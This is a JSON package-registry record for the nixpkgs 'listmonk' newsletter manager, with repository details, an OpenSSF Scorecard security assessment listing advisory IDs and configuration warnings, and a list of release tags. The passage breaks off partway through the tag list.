[{"id":12821984,"name":"listmonk","ecosystem":"nixpkgs","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard","homepage":"https://github.com/knadh/listmonk","licenses":"AGPL-3.0-only","normalized_licenses":["AGPL-3.0-only"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T18:14:49.297Z","latest_release_published_at":"2026-01-26T18:14:49.297Z","latest_release_number":"6.0.0","last_synced_at":"2026-04-02T17:11:16.118Z","created_at":"2026-01-26T18:14:49.102Z","updated_at":"2026-08-18T02:47:53.660Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=listmonk","install_command":"nix-env -iA nixpkgs.listmonk","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/by-name/li/listmonk/package.nix#L76","metadata":{"nix_attribute":"listmonk-6.0.0","position":"pkgs/by-name/li/listmonk/package.nix:76","platforms":["x86_64-darwin","aarch64-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","wasm64-wasi","wasm32-wasi","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-17T17:59:57.000Z","size":51687,"stargazers_count":22959,"open_issues_count":105,"forks_count":2530,"subscribers_count":140,"default_branch":"master","last_synced_at":"2026-08-18T02:44:25.356Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-18T02:21:35.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36754175,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-18T02:00:06.197Z","response_time":52,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk